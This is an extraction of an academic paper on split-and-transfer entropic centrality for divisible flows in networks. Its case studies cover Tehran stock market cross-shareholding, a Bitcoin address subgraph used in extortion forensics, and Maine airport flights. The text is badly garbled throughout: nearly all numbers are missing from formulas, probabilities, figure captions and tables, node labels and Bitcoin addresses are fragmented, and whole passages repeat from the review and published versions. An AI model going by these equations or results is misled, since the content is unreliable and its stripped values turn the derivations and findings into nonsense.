pair {v ,v } is preferred (they receive / of the batches, versus / for the group {v ,v }). furthermore, in the first case, v receives a higher volume than v (say / of the batch goes to v ), while for the second case, v takes / of the batch shared with v . once v ,v obtain the items, they typically keep half for themselves, and distribute the other half to v . to compute the centrality of v , we consider a divisible flow starting at u = v which can split among different paths instead of following one. to model the choice of splitting among possible neighbors, we first define a probability q(x) over the set eu = { {v }, {v }, {v }, {v }, {v ,v }, {v ,v }, {v ,v }, {v ,v }, {v ,v }, {v ,v }, {v ,v ,v }, {v ,v ,v }, {v ,v ,v }, {v ,v ,v }, {v ,v ,v ,v } } such that, for our example, q({v ,v }) = , q({v ,v }) = , and q(x) = for other choices of x (in contrast to (oggier et al. ( c)) where it was chosen to be uniformly at random). this represents the fact that / of the time, v sends the goods to the pair {v ,v } (as shown in figure a), while for the rest of the time, / peerj comput. sci. reviewing pdf | (cs- : : : : :new aug ) manuscript to be reviewedcomputer science figure an example of transfer centrality involving already visited neighbors. if probabilities are uni- form at random (a), they are scaled according to the number of unvisited neighbors. if not (b), they are scaled proportionally to the existing probabilities. full-size doi: . /peerjcs. /fig- the centrality of v , a flow leaves v , it can go to either v , v or v . when reaching v , the flow cannot go back to v , since v is already visited (and going back would not give a path anymore), there the probabilities to stay at v and to go to v from v are modified. oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. v v v v v (a) v v v v v (b) u v v v v (c) figure . an example of split-and-transfer entropic centrality: on ( a) in red, the event corresponding to choosing {v ,v }, in ( b), the event {v ,v }. the probabilities pu,v are computed by summing over both events, weighted by the respective event probability: pv ,v = ( ) = , pv ,v = ( ) = , pv ,v = ( )+ ( ), pv ,v = ( )+ ( + ). this gives ch(v ) ≈ . . it sends it to the pair {v ,v } (shown in figure b). we compute the path probabilities for each event, for q({v ,v }) = and for q({v ,v }) = accordingly. we have further information: when v deals with {v ,v }, there is a bias of for v compared to for v , and the bias is of for v in the other case. the corresponding probabilities are attached to the edges {(v ,v ),(v ,v )} and {(v ,v ),(v ,v )} respectively (shown in figure c). now that the edge probabilities are defined, we can compute the path probabilities. for example, from v to v , we sum up the path probabilities for both events, weighted by the respective event probability: ( )+ ( + ). we next provide a general formula. we let a flow start at a vertex whose centrality we wish to compute, and at some point of the propagation process, a part fu of the flow reaches u. let nu be the neighborhood of interest given fu, that is, the set of outgoing neighbors which have not yet been visited by the flow. every outgoing edge (u,v) of u exactly corresponds to some outgoing neighbor v, so in what follows, we may refer to either one or the other. let eu denote the set of possible outgoing edge subsets (where every edge (u,v) is represented by v the neighbor). we attach a possibly distinct probability q(x) to every choice x in eu. then ∑x∈eu q(x) = . every x in eu corresponds to a set of edges (u,v) for v a neighbor. we further attach a weight ωx(u,v) to every edge in x, with the constraint that ∑(u,v)∈x ωx(u,v) = fu. for example, we could choose all edges with equal weight, that is ωx(u,v) = fu i for every (u,v) in x containing i edges, to instantiate the special case where the flow is uniformly split among all edges. for a given node u, we compute the expected flow from u to a chosen neighbor v. every such choice of x comes with a probability q(x), and every edge (u,v) in x has a weight ωx(u,v), which sums up to fuv = ∑ x∈eu,v q(x)ωx(u,v), ( ) where eu,v contains the sets in eu themselves containing v. example . consider the running example, with u = v . the set of neighbors of u is nu = {u,v ,v ,v }. we assign the following probabilities: q({u}) = q , q({v }) = q , q({v }) = q , q({v }) = q , q({u,v }) = q , q({u,v }) = q , q({u,v }) = q , q({v ,v }) = q , q({v ,v }) = q , q({v ,v }) = q , q({u,v ,v }) = q , q({u,v ,v }) = q , q({u,v ,v }) = q , q({v ,v ,v }) = q , q({u,v ,v ,v }) = q , with ∑ i= qi = . we write down explicitly the terms involved in the sum ( ) for two nodes, v and v : fu,v = q fu + q ω{u,v }(u,v )+ q ω{v ,v }(u,v )+ q ω{v ,v }(u,v )+ q ω{u,v ,v }(u,v ) +q ω{u,v ,v }(u,v )+ q ω{v ,v ,v }(u,v )+ q ω{u,v ,v ,v }(u,v ). fu,v = q fu + q ω{u,v }(u,v )+ q ω{v ,v }(u,v )+ q ω{v ,v }(u,v )+ q ω{u,v ,v }(u,v )+ q ω{u,v ,v }(u,v )+ q ω{v ,v ,v }(u,v )+ q ω{u,v ,v ,v }(u,v ). / peerj comput. sci. reviewing pdf | (cs- : : : : :new aug ) manuscript to be reviewedcomputer science figure an example of split-and-transfer entropic centrality: on (a) in red, the event corresponding to choosing {v ,v }, in (b), the event {v ,v }. the probabilities pu,v are computed by summing over both events, weighted by the respective event probability: pv ,v = ( )= , pv ,v = ( )= , pv ,v = ( )+ ( ), pv ,v = ( )+ ( + ). this gives ch (v )≈ . . full-size doi: . /peerjcs. /fig- on the left, when probabilities are uniform, since now only two outgoing edges of v are available, namely edges (v ,v ) and (v ,v ), each is assigned a probability of . on the right, when probabilities are not uniform, we distribute the probability of going to some visited vertex proportionally to the rest of the available edges. since is going to v while is staying at v , we have and out of respectively leaving and staying, thus obtaining the renormalized probabilities as + = and + = . the examples of figs. and illustrate diverse cases of indivisible flow. by definition of indivisibility, the choice of an edge at a vertex u corresponds to choosing subsets containing one vertex only in the list of all subsets of neighbors. we can thus set a probability to all subsets which contain more than one vertex. therefore, the definition of entropic centrality in ( ), with or without uniform edge probabilities, are particular cases of the proposed split-and-transfer framework, that we discuss next. the split-and-transfer entropic centrality consider the network of fig. depicting a seller v whose direct customers are v ,v ,v . say we further know that when v distributes a new batch of items, he does so to either customers {v ,v } or {v ,v }, and in fact, the pair {v ,v } is preferred (they receive / of the batches, versus / for the group {v ,v }). furthermore, in the first case, v receives a higher volume than v (say / of the batch goes to v ), while for the second case, v takes / of the batch shared with v . once v ,v obtain the items, they typically keep half for themselves, and distribute the other half to v . to compute the centrality of v , we consider a divisible flow starting at u=v which can split among different paths instead of following one. to model the choice of splitting among possible neighbors, we first define a probability q(x) over the set eu ={{v }, {v }, {v }, {v }, {v ,v }, {v ,v }, {v ,v }, {v ,v }, {v ,v }, {v ,v }, {v ,v ,v }, {v ,v ,v }, {v ,v ,v }, {v ,v ,v }, {v ,v ,v ,v }} such that, for our example, q({v ,v })= , q({v ,v })= , and oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. q(x)= for other choices of x (in contrast to oggier, silivanxay & datta ( ) where it was chosen to be uniformly at random). this represents the fact that / of the time, v sends the goods to the pair {v ,v } (as shown in fig. a), while for the rest of the time, it sends it to the pair {v ,v } (shown in fig. b). we compute the path probabilities for each event, for q({v ,v })= and for q({v ,v })= accordingly. we have further information: when v deals with {v ,v }, there is a bias of for v compared to for v , and the bias is of for v in the other case. the corresponding probabilities are attached to the edges {(v ,v ),(v ,v )} and {(v ,v ),(v ,v )} respectively (shown in fig. c). now that the edge probabilities are defined, we can compute the path probabilities. for example, from v to v , we sum up the path probabilities for both events, weighted by the respective event probability: ( )+ ( + ). we next provide a general formula. we let a flow start at a vertex whose centrality we wish to compute, and at some point of the propagation process, a part fu of the flow reaches u. let nu be the neighborhood of interest given fu, that is, the set of outgoing neighbors which have not yet been visited by the flow. every outgoing edge (u,v) of u exactly corresponds to some outgoing neighbor v, so in what follows, we may refer to either one or the other. let eu denote the set of possible outgoing edge subsets (where every edge (u,v) is represented by v the neighbor). we attach a possibly distinct probability q(x) to every choice x in eu. then ∑ x∈euq(x)= . every x in eu corresponds to a set of edges (u,v) for v a neighbor. we further attach a weight ωx(u,v) to every edge in x, with the constraint that ∑ (u,v)∈xωx(u,v)= fu. for example, we could choose all edges with equal weight, that is ωx(u,v)= fu i for every (u,v) in x containing i edges, to instantiate the special case where the flow is uniformly split among all edges. for a given node u, we compute the expected flow from u to a chosen neighbor v. every such choice of x comes with a probability q(x), and every edge (u,v) in x has a weight ωx(u,v), which sums up to fuv = ∑ x∈eu,v q(x)ωx(u,v), ( ) where eu,v contains the sets in eu themselves containing v. example consider the running example, with u=v . the set of neighbors of u is nu ={u,v ,v ,v }. we assign the following probabilities: q({u})=q , q({v })=q , q({v })=q , q({v })=q , q({u,v })=q , q({u,v })=q , q({u,v })=q , q({v ,v })=q , q({v ,v })=q , q({v ,v })=q , q({u,v ,v })=q , q({u,v ,v })=q , q({u,v ,v })=q , q({v ,v ,v })=q , q({u,v ,v ,v })=q , with ∑ i= qi = . we write down explicitly the terms involved in the sum ( ) for two nodes, v and v : fu,v =q fu+q ω{u,v }(u,v )+q ω{v ,v }(u,v )+q ω{v ,v }(u,v )+q ω{u,v ,v }(u,v ) +q ω{u,v ,v }(u,v )+q ω{v ,v ,v }(u,v )+q ω{u,v ,v ,v }(u,v ). fu,v =q fu+q ω{u,v }(u,v )+q ω{v ,v }(u,v )+q ω{v ,v }(u,v ) +q ω{u,v ,v }(u,v )+q ω{u,v ,v }(u,v )+q ω{v ,v ,v }(u,v )+q ω{u,v ,v ,v }(u,v ). oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. then fu,u+fu,v +fu,v +fu,v = fu ∑ i= qi = fu. by setting q = and ω{v ,v }(u,v )= fu , we find fu,v = fu . also, adding up q = and ω{v ,v }(u,v )= fu , ω{v ,v }(u,v )= fu , we find fu,v = fu + fu = fu . similarly fu,v = fu and indeed fu + fu + fu = fu. we repeat the computations for fv ,v and fv ,v . for that, we need to know what is fv and fv , but in this case, since both v and v only have one incoming edge, we have that fv = fv ,v and fv = fv ,v : fv ,v = fv = fu ,fv ,v = fv = fu ,fv = fv ,v +fv ,v = fu . it is true that by setting fu = , we have fu,v = =pu,v as computed in fig. , but this is true because pv ,v = . if we consider v instead, we find fu,v = = pu,v , this is because we have computed what reaches v , but since v has an outgoing edge, we need to distinguish what stays from what continues. notice that by setting fu= and fv = fv = , we get fu,v = ,fu,v = ,fu,v = ,fv ,v = ,fv ,v = . we then assign to edge (vi,vj) the probability fvi,vj (with fu= ) as reported on fig. a. the property of flow conservation observed in the example holds true in general, which we shall prove next. indeed, when v varies in nu, the sets eu,v appearing in the summation ∑ v∈nu ∑ x∈eu,v q(x)ωx(u,v) may intersect, so for each choice x, one can gather all the eu,v that contains x. for this x, we find a term in the above sum of the form q(x) ∑ (u,v)∈xωx(u,v)=q(x)fu. then∑ v∈nu ∑ x∈eu,v q(x)ωx(u,v)= ∑ x∈eu q(x)fu= fu. this shows that the flow from u to v is conserved over all the neighbors v ∈nu given fu. thus, by setting fu= , the quantity fuv = ∑ x∈eu,v q(x)ωx(u,v) becomes a probability, and in fact, putting this probability on the edge (u,v) in the context of the transfer entropic centrality gives the same result as the above computations using the split-and-transfer model, as in fact already illustrated on the figure in example , since the probabilities displayed on the edges of the graph have been computed in this manner. we summarized what we computed in the proposition below. proposition the split-and-transfer entropic centrality ch,p(u) of a vertex u is given by ch,p(u)=− ∑ v∈v quvlog (quv) where quv = ∑ x∈eu,v q(x)ωx(u,v) is computed from ( ) with fu = and the usual convention that · log = is assumed. the index p in ch,p emphasizes the dependency on the choice of the probability distribution p. then we have ch,unif when p is uniform as a particular case. oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we thank the authors of dastkhan & gharneh ( ) for sharing their data with us. we thus showed that the split-and-transfer entropic centrality is equivalent to a transfer entropic centrality, assuming the suitable computation of edge probabilities. the notion of split-and-transfer entropic centrality characterizes the spread of a flow starting at u through the graph. now two vertices may have the same spread, but one vertex may be dealing with an amount of goods much larger than the other. in order to capture the scale of a flow, we also propose a scaled version of the above entropy. definition the scaled split-and-transfer entropic centrality is accordingly given by f(fu)ch,p(u) where f is a scaling function. as a corollary, the computational complexity of this centrality measure is the same as that of tutzauer ( ), namely that of a depth first search, i.e., o(|v |+|e|) (migliore, martorana & sciortino, ). when the graph becomes large and some probability become negligible, a natural heuristic of setting them to is used. the scaling function f may depend on the nature of the underlying real world phenomenon being modeled by the graph, with f(fu)= fu being a simple default possible choice (other standard choices are f(fu)= √ fu or f(fu)= log(fu)). we use the default choice in the example below. example continuing with the same example, we use the edge probabilities as obtained in example to compute the transfer entropic centrality from definition . the scaled entropic centralities of u= v and v are simply fuch,p(v )≈ fu . and fv ch,p(v )= fv ( log ( )+ log ( ))= fv . without the scaling factor, ch,p is a measure of spread, and it makes sense that ch,p(v )>ch,p(v ). however if v is actually distributing some items in overall small amounts, while v is not only getting this item from v but also producing it and furthermore sending it only to v but in large amounts, then the scaling factor could be used to refine the analysis and account for this extra information. from the moment fv ≥ . fv , v will be deemed more important than v as per the scaled entropic centrality measure. case studies shareholding in tehran stock market we next consider companies from the tehran stock market, as listed in appendix a of dastkhan & gharneh ( ). they form the vertices of a cross-shareholding network of companies which have shares of other companies. there is an edge between i and j if company i belongs to the investment portfolio of company j, i.e., j owns some share of i. therefore the in-degree of node j is the number of companies that belong to the investment portfolio of company j. conversely, the out-degree of node j is the number of companies that are shareholders of j. edges are weighted, edge (i,j) has for weight the percentage of shares that company j has from company i. we will consider this graph, shown in fig. , and the graph with reverse edge directionality. nodes highlighted in green in fig. have one edge with weight more than . , meaning that more than % of their shares are owned by another company, otherwise they are in grey. nodes highlighted in vermillion, superseding the other coloring, have the highest in-degrees, which means that they own shares of many other companies. they are nodes oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure cross-shareholding network of tehran stock market companies: vermillion and sky blue nodes have respectively the highest in- and out-degrees. nodes circled in sky blue respectively vermillion have the highest entropic centrality under the current and reverse edge directionality. full-size doi: . /peerjcs. /fig- (adashare), (nikx ), (oilcopen), (sa a ), (tamin org), and (government). nodes highlighted in sky blue have the highest out-degrees, which means that their shares are owned by many other companies (but possibly in small amounts). they are nodes (bmex ), (ch ), (fo ), (gd ), (go ) with degree and (pfax ), (madn), (ms ) and (pk ) with degree . we next assign probabilities to edges: we use the edge weight, and fix the edge probability to be inversely proportional to its weight. self-loops have a natural interpretation. since the outgoing edges of node j indicate the companies that are shareholders of j, the self-loop refers to j still owning some of its own shares, and the amount is % minus what the other companies own (share ownerships with negligible amounts were not taken into account in the data set, so self-loops absorb these portions). table lists the seven nodes with the highest entropic centrality. the interpretation of entropic centrality here is that we are looking at the nodes whose shares are ‘‘most diversely owned’’ in terms of their shares being owned by different companies, whose shares are in turn themselves owned by others. the economic fortunes of the company whose centrality is looked at thus also affects those of the other companies, and the entropic centrality thus indicates the impact a particular company’s economic performance would have on the rest. we immediately see that this centrality measure is different from out-degree oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table vertices with the highest entropic centrality, their scaled entropic centrality, where fu is the market size in percentage (their relative ranking is marked with subscript), their out-degrees (in the above part) or in-degrees (in the below part, for the graph with reverse edge direc- tionality) and neighbors with the weight of the connecting edges. bold face indicates a high degree. ranks with respect to alpha/katz (ak) with α= , pagerank (pr) weighted (w) and unweighted (u), and betweenness (b). no id ch,p fu fuch,p out neighbors a/k pr(u/w) b (w) arfz . . . ( , . ), ( , . ), / / ( , . ), ( , . ) ( , . ), ( , . ) go . . . ( , . ),( , . ) / / ( , . ),( , . ) ( , . ), ( , . ) ( , . ) ipar . . . ( , . ),( , . ) / / ( , . ), ( , . ), ( , . ) prds . . . ( , . ), ( , . ), / / ( , . ), ( , . ) ( , . ) pk a . . . ( , . ), ( , . ) / / knrx . . . ( , . ),( , . ) / / ( , . ) prsx . . . ( , . ), ( , . ) / / ( , . ), ( , . ) ( , . ), ( , . ) no id ch,p fu in neighbors gov . . ( , . ) tamin org . . ( , . ) adashare . . btej . . ( , . ) oilcopen . . tmel . . nikx . . centrality. we can however look at how they relate, by considering the role of out-degrees not only on the nodes but also on their neighbors. we observe that only node has one of the highest out-degrees, however, nodes and still have high out-degrees, but also are connected to neighbors which have high out-degrees, in fact, node which has the highest entropic centrality has three high out-degree neighbors. for nodes and , they still have a relatively high out-degree. for , it has a fairly low out-degree, but out of the neighbors, two have high degrees themselves. the case of node is particularly interesting, since it has only two neighbors, namely and . neither of nor has a high centrality individually, but they together provide node a conduit to a larger oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. subgraph than the individual transit nodes themselves do, illustrating the secondary effects of flow propagation. the cross-shareholding network of tehran stock market was analyzed in dastkhan & gharneh ( ), where a closeness centrality ranking is shown to be almost identical to the degree based centrality one. the entropic centrality ranking in contrast manages to capture a different dynamics, by involving the spread of influence via flow propagation, together with a quantitative edge differentiation. the above approaches ignore any other information such as the market size share of the organizations. arguably, between two organizations with identical position in the graph, the one with larger market size may be deemed to have larger influence on the other nodes. this is modeled by the scaled entropic centrality ch(u)fu, where fu is the market size in percentage. we notice that this indeed creates a distinct relative ranking (indicated by subscript in table , for example, arfz is ranked rd as per weighted entropic centrality). particularly, among the top seven companies as per ch(u), we see that only prds continues to be in the same (fourth) rank. knrx has the largest change in ranking, up from sixth to second. while the scaled entropic centrality ranking of the top two nodes are congruent with the ranking based solely on the scale factor (market size), we see that arfz , which would be ranked th by market size, and first by solely network effect, is ranked rd when both factors are taken into account. we compare the entropic centrality ch,p with respect to the alpha, katz and pagerank centralities (using the reverse edge direction). note that the unweighted graph has for largest eigenvalue λ ' . (so λ ' . ). the ranking results for the most central entities from the tehran stock exchange, and the overall kendall tau rank correlation coefficients kendall ( ) are reported in tables and respectively. the kendall tau coefficient indicates the rank correlation among a pair or ranked lists (see schoch, valente & brandes, for a discussion on why kendall tau is preferred to pearson). the entity is outstandingly central with respect to all metrics but weighted betweenness. the alpha and katz centralities yield very similar results, but they rank the entity as third instead of second. they rank second the entity . a likely explanation could be that that actually has a higher out-degree (and thus a higher in-degree in the reversed edge network) than entity . the top most central entities have mostly a betweenness (ranked ), and are mostly ranked pretty low with respect to both versions of pagerank, weighted and unweighted. the most central entity for the weighted betweenness is , which is one of the most central with respect to in-degree (it has an in-degree of ). then and are second respectively for the unweighted and weighted pagerank. entity has out-neighbors , , , , which become in-neighbors in the reversed edge graph, neither itself nor its neighbors stand out by their degrees, however has for in-neighbors in the reversed edge graph , , , , , , and both and are very central with respect to in-degree, making it easier to explain why it is ranked high. note that the assortativity coefficient of this graph is≈− . , so this is a non-assortative graph, where high degree nodes do not particularly connect to neither high nor low degree nodes. oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table kendall rank correlation coefficient τκ across the centralities for the tehran stock exchange. ch,p alpha pagerank (uw) pagerank (w) katz (α = . ) α = . α = . (α = . ) ch,p . . . . alpha . . . . pagerank(uw) . . . . pagerank(w) . . . . katz . . . . the kendall rank correlation confirms that the entropic centrality differs from the other metrics not only to decide the most central vertices but also overall. the kendall coefficient for unweighted betweenness has not been reported since only vertices have a non-zero betweenness. this shows that the graph considered is far from being strongly connected. overall, comparison points illustrate that the entropic centrality ch,p provides a new perspective not captured by the other algorithms. we next consider the same graph but where edge directionality is reversed. a node becomes central if it owns diverse companies, which themselves may in turn own various companies. since owning shares could be used to influence an organization’s management, the entropic centrality based on reverse edges is thus a proxy indicator of how much control a specific entity has over the other entities in the market. organizations with very high entropic centralities using either sense of edge direction could then be seen as probable candidates causing structural risks—be it by being ‘too big to fail’, or having too much control over significant portions of the market for it to be fairly competitive. the nodes with highest entropic centrality are shown in table . the most important one is the government: we expect it to be one of the most important players in iran when it comes to owning shares in other companies (and yet not to appear in the list when the original edge direction is considered). we see a higher correlation between entropic centrality and in-degree than there was between entropic centrality and out-degree in table . among the seven most central nodes, five of them are having one of the highest in-degrees, the two most central nodes have themselves one high degree neighbor. then node has a fairly low in-degree, but it is connected to node . in summary, the case study of the tehran stock exchange network exhibits three important intertwined aspects of our model. firstly, it is flexible. it seamlessly captures the effect of relationships, considered either in a binary fashion (just the structure), or quantified with relative strengths (the skew in strength of the relationships), while it can also accommodate information which is intrinsic to the node but somewhat disentangled from the network (used as a scale factor). second, reversing the edge direction gives a dual perspective. finally, we see that we obtain different results and corresponding insights, based on which variations of the model is applied for a specific study. naturally, figuring it out the best variation is done on a case-by-case basis. oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a subgraph of the bitcoin subgraph, which comprises only addresses that have non-zero en- tropic centrality. those in red are listed in table , with the highest entropic centrality. full-size doi: . /peerjcs. /fig- a bitcoin subgraph our final case study is a subgraph of the bitcoin wallet address network derived from bitcoin transaction logs (see fig. ). bitcoin is a cryptocurrency (nakamoto, ), and transactions (buy and sell) among users of this currency are stored and publicly available in a distributed ledger called blockchain. user identities are unknown, but each user has one or many wallet addresses, that are identifiers in every transaction. then one transaction record amalgamates the wallet addresses of possibly several payers and payment receivers, together with the transaction amounts. to be more precise, consider two bitcoin transactions t and t . the transaction t has n inputs, from wallet addresses a ,...,an, of amounts i ,...,i n respectively. the outputs, of amounts o ,...,o m go to wallet addresses c ,...,cm respectively. the sum of inputs equals the sum of outputs and any transaction fees (say τ ), i.e., |t |= ∑n k= i k =τ + ∑m l= o l. for the sake of simplicity, we will ignore the transaction fees (i.e., consider τ = ). a similar setting holds for transaction t , where the same wallet address a appears again as part of the inputs, together with some wallet addresses b ,...,bn′ which may or not oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table addresses with highest entropic centrality in the bitcoin subgraph above (with the respective relative ranks as per other centralities— alpha/katz with α = . (ak), pagerank (pr), weighted (w) and unweighted (u)) and with highest centrality when edges have reverse direc- tionality below. address ch,p fu out fuch ak pr (u/w) cd qw fjgtwkq pj nty wzavkzinom . . / pjb ghfrd uqs hv n wt i mzp wke . . / eab ndg wj wr uvwqirtmzwaa rqk s . . / myqqj lbde u drsadprkxwobvza ugaw . . / mmqxz knqfmecjlw atdygfwxvvnjfg . . / xzf ys sbqnakyna ybckyzwn sezau . . / p c jpf oxhgxqt vgmrccbev yepadum . . / fp ejyy fsj y kb vrjjunteuvysuq . . / q spycn szquoqygahkgdhc ynrsrfrw . . / a ngsmr whvnj gaj cm y kfe i . . / ce juqn rh ysdb vvshoyymzlpkcqaaa . . / qbsjfhwkbgznmuhmuhdczpazns pme . . / kdgkr qov ws wpnaa rhjce n uevys . . / nxabcfqwejszbqfwcynwgqml wwoe rk . . / address ch,p fu in pjb ghfrd uqs hv n wt i mzp wke . . eab ndg wj wr uvwqirtmzwaa rqk s . . hwpb m vxdn kvss rsmnrqqjlhxvyn . . c pdyzjrdqomyywdheqx huyoyqogygdv . . zksvrsduux e mmnvvba c esfnvvdfa . . intersect with a ,...,an. by design, bitcoin transactions do not retain an association as to which specific inputs within a transaction are used to create specific outputs. suppose one would like to create a derived address network from some extract of the bitcoin logs of transactions, that is a graph whose nodes are bitcoin wallet addresses, and edges are directed and weighted. there should be an edge from address u to address v if there is at least one transaction where some amount of bitcoin is going from u to v. however as explained above, it is not always possible to disambiguate the input–output pairs. if the input amounts are particularly mutually distinct, and so are the output amounts, and there are input–output amounts that match closely, one might be able to make reasonable guess about matching a specific input to a specific output. in general, in absence of such particular information, one heuristic is to model the input–output association probabilistically. a common heuristic (kondor et al., ) is to consider that based on transaction t there is an edge from a to each of c ,...,cm. the same holds for transaction t . thus in the derived address network, there will be an edge from a to each of the c ,...,cm,d ,...,dm′. if some outputs x,...,z are in common to both transaction outputs, there is a single edge between a and each of the addresses x,...,z. the derived address network gives us the graph to be analyzed, whose vertices are wallet addresses and edges are built as above. originally, a given wallet address is sending oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. bitcoins to possibly different output wallet addresses within one transaction, and the same wallet address may be involved in different transactions, with possible reoccurences of the same output addresses (this is the case of a which is an input to both transactions t and t and x,...,z appear as output transactions in both). in the split-and-transfer flow model, we can incorporate this information into the derived address network by assigning the probabilities q({c ,...,cm})= i i +i and q({d ,...,dm′})= i i +i with which the respective subsets {c ,...,cm} and {d ,...,dm′} of the set {c ,...,cm,d ,...,dm′} of neighbors of a are used. other choices for q(x) are possible, the rationale for this specific choice is to use a probability that is proportional to the amount of bitcoin injected by a in each of the transactions. edge weights in the derived address network are computed as follows. let |t |= ∑m k= o k and |t |= ∑m′ k= o k denote the total amounts involved in each of the transactions. for an edge between a and cl, which happens in t , it is ωc ,...,cm(a ,cl)= o l |t | , while for an edge between a and dl, which happens in t , it is ωd ,...,dm′(a ,dl)= o l |t | . we thus have m∑ l= ωc ,...,cm(a ,cl)= m∑ l= o l |t | = , m′∑ l= ωd ,...,dm′(a ,dl)= m′∑ l= o l |t | = . if some node pairs, and thus edges, repeat across transactions (for example, a to x,...,z in our example), these edge weights should cumulate in the overall derived address network. this is captured by the formula ( ) which is here instantiated as fa ,x =q({c ,...,cm})ωc ,...,cm(a ,x)+q({d ,...,dm′})ωd ,...,dm′(a ,x) = i i +i o x |t | + i i +i o x |t | where in transaction t the output to address x is o x, while it is o x in transaction t . in a departure from previous works that derive the address network in a manner explained above kondor et al. ( ), our graph model is able to retain the information that subsets of edges co-occur, or not, as displayed above. for that reason, the bitcoin address network is a natural candidate (and in fact, part of the inspiration) for the general flow model with arbitrary splits and transfers as considered in this paper, where individual flows may go through a subset of outgoing edges. for our experiments, we choose a bitcoin subgraph appearing in the investigation of wallet addresses involved in extorting victims of ashley-madison data breach (see oggier, phetsouvanh & datta, a for accessing the data). it is obtained by extracting a subgraph of radius (if the graph were undirected) around the wallet address g wbtl gwkudyjnyvmpixtqagktlrmv. while we would like to emphasize that we use here this bitcoin graph to explore the entropic centrality model, it may still be worth mentioning that one identified suspect node from another of our study (phetsouvanh, oggier & datta, ), namely node hwpb m vxdn kvss rsmnrqqjlhxvyn , has high enough entropic centrality to be listed (see table below) as a top entropic centrality node. thus, the entropic centrality analysis can be used as a tool to identify nodes of interest, and to create a shortlist of nodes to be investigated further in detail, in the context of bitcoin forensics. oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table kendall rank correlation coefficient τκ across the centrality algorithms for the bitcoin sub- graph dataset (excluding nodes which all had an entropic centrality score of zero). ch,p fuch,p alpha pagerank pagerank katz (α = . ) (uw) (w) (α = . ) ch,p . . . . . fuch,p . . . . . alpha . . . . . pagerank(uw) . . . . . pagerank(w) . . . . . katz . . . . . tables and compare the entropic centrality ch,p with other centralities. with respect to scaled entropic centrality, there is a large variation in the weightages associated with the edges, which has a significant impact on the relative rankings between scaled/unscaled entropic centralities. with respect to weighted betweenness, only three addresses are relevant, they are, with their respective in- and out-degree, eab ndg wj wr uvwqirtmzwaa rqk s (ranked , in-degree: , out-degree: ), pjb ghfrd uqs hv n wt i mzp wke (ranked , in-degree: , out-degree: ), and cd qw fjgtwkq pj nty wzavkzinom (in-degree: , out-degree: ). the other addresses are ranked (corresponding to a betweenness of ). the graph has for largest eigenvalue λ ' . and λ ' . . as with the previous cases, alpha and katz centralities are very close to each other, they also agree more closely with ch,p on the most central addresses, but table shows that this is not the case in general. the trends shown by the kendall rank correlation coefficient is similar to previous cases: there are more dissimilarities between pagerank and entropic centralities than between alpha/katz and entropic centralities, but overall, entropic centralities give a different view point, as would be expected by extrapolating borgatti’s view point. the assortativity coefficient of the illustrated bitcoin subgraph is≈− . , suggesting a slight disassortativity. this is easily explained as an artefact of the way the subgraph was extracted (a small radius around a node), yielding a couple of hubs with nodes connected only to them (leaves). in this example, these leaves are having an entropic centrality influenced by having these hubs as their first neighbors. as a last scenario, we consider the small network of maine airports, with their connecting flights, for a total of airports (see oggier, phetsouvanh & datta, b for accessing the data.). we created the network based on flights involving passenger for the period of january as per the data obtained from the united states department of transportation bureau of transportation statistics website (https: //www.transtats.bts.gov/dl_selectfields.asp?table_id= ). in table , we synopsize the kendall’s tau coefficient τκ. the lower the value of this coefficient, the closer (similar) two ranked lists are. we see that ch,unif produces results which are very similar to alpha and katz centralities, but ch,p yields a reasonably distinct result instead. furthermore, results from both pagerank applied to both weighted and unweighted graphs are most distinct both with respect to entropic centralities, as well oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.transtats.bts.gov/dl_selectfields.asp?table_id= https://www.transtats.bts.gov/dl_selectfields.asp?table_id= http://dx.doi.org/ . /peerj-cs. table kendall rank correlation coefficient τκ across the centrality algorithms for the airports net- work data. uniform non-uniform alpha pagerank pagerank katz (α = . ) (uw) (w) (α = . ) uniform entropic . . . . . non-uniform entropic . . . . . alpha . . . . pagerank(uw) . . . . . pagerank(w) . . . . . katz . . . . as the other existing centralities explored in our experiments. the assortative coefficient is ≈− . , this is thus a disassortative network. indeed it contains two airports that serve as hubs, and small airports connected to it (or important airports whose edges have been cut when extracting the specific subgraph). in terms of entropic centrality, this corresponds to having small airports inheriting the influence of being connected to hubs. conclusions in this paper, we studied the concept of entropic centrality proposed by tutzauer ( ), which originally determined the importance of a vertex based on the extent of dissemination of an indivisible flow originating at it, by considering the uncertainty in determining its destination. we extended this concept to model divisible flows, which better reflect certain real world phenomenon, for instance, flows of money. in fact, one of the motivating scenarios that prompted us to study this model was to study the network induced by bitcoin transactions—though, in the course of the work, and to validate the model, we also identified and analyzed other use cases, with arbitrary divisions of the flow. a previous work which considered only equitable divisions of the flow was shown to be a special case of the general model studied in this paper. the flow based entropic centrality model bears in spirit some similarity with eigenvector based centrality measures in the sense that the importance of vertex node is determined by taking into account a transitive effect, namely, connections to a central vertex contributes to increase the centrality. we thus compared our approach with several representatives of this family, specifically alpha centrality, pagerank and katz centrality. we observed that alpha and katz centralities are closer to entropic centralities than pagerank (in terms of kendall tau distance), but they are still fairly different. this could be 